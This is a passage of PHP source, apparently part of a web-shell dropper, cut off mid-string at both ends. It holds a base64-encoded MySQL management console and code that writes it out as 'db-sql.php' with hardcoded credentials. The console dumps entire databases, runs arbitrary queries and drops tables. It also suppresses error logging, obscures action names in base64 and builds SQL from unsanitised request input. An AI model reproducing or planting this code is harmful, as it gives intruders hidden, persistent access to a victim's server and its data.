+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==';
        $file = fopen("db-sql.php", "w+");
        $write = fwrite($file, "<?\r\n\$PASSWORD = \"root_xhahax\";\r\n\$USERNAME = \"xhahax\";\r\nif ( function_exists('ini_get') ) {\r\n\t\$onoff = ini_get('register_globals');\r\n} else {\r\n\t\$onoff = get_cfg_var('register_globals');\r\n}\r\nif (\$onoff != 1) {\r\n\t@extract(\$HTTP_SERVER_VARS, EXTR_SKIP);\r\n\t@extract(\$HTTP_COOKIE_VARS, EXTR_SKIP);\r\n\t@extract(\$HTTP_POST_FILES, EXTR_SKIP);\r\n\t@extract(\$HTTP_POST_VARS, EXTR_SKIP);\r\n\t@extract(\$HTTP_GET_VARS, EXTR_SKIP);\r\n\t@extract(\$HTTP_ENV_VARS, EXTR_SKIP);\r\n}\r\n\r\nfunction logon() {\r\n\tglobal \$PHP_SELF;\r\n\tsetcookie( \"mysql_web_admin_username\" );\r\n\tsetcookie( \"mysql_web_admin_password\" );\r\n\tsetcookie( \"mysql_web_admin_hostname\" );\r\n\techo \"<table width=100% height=100%><tr><td><center>\\n\";\r\n\techo \"<table cellpadding=2><tr><td><center>\\n\";\r\n\techo \"<table cellpadding=20><tr><td><center>\\n\";\r\n\techo \"<h1>MySQL Interface By S4MP4H</h1>\\n\";\r\n\techo \"<form action='\$PHP_SELF'>\\n\";\r\n\techo \"<input type=hidden name=action value=bG9nb25fc3VibWl0>\\n\";\r\n\techo \"<table cellpadding=5 cellspacing=1>\\n\";\r\n\techo \"<tr><td class=\\\"new\\\">Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\\n\";\r\n\techo \"<tr><td class=\\\"new\\\">Username </td><td> <input type=text name=username></td></tr>\\n\";\r\n\techo \"<tr><td class=\\\"new\\\">Password </td><td> <input type=password name=password></td></tr>\\n\";\r\n\techo \"</table><p>\\n\";\r\n\techo \"<input type=submit value='Enter'>\\n\";\r\n\techo \"<input type=reset value='Clear'><br>\\n\";\r\n\techo \"</form>\\n\";\r\n\techo \"</center></td></tr></table>\\n\";\r\n\techo \"</center></td></tr></table>\\n\";\r\n\techo \"<p><hr width=300>\\n\";\r\n\techo \"</center></td></tr></table>\\n\";\r\n}\r\n\r\nfunction logon_submit() {\r\n\tglobal \$username, \$password, \$hostname ,\$PHP_SELF;\r\n\tif(\$hostname =='')\r\n\t\t\$hostname = 'localhost';\r\n\tsetcookie( \"mysql_web_admin_username\", \$username );\r\n\tsetcookie( \"mysql_web_admin_password\", \$password );\r\n\tsetcookie( \"mysql_web_admin_hostname\", \$hostname );\r\n\techo \"<META HTTP-EQUIV=Refresh CONTENT='0; URL=\$PHP_SELF?action=bGlzdERCcw=='>\";\r\n}\r\n\r\nfunction echoQueryResult() {\r\n\tglobal \$queryStr, \$errMsg;\r\n\tif( \$errMsg == \"\" ) \$errMsg = \"Success\";\r\n\tif( \$queryStr != \"\" ) {\r\n\t\techo 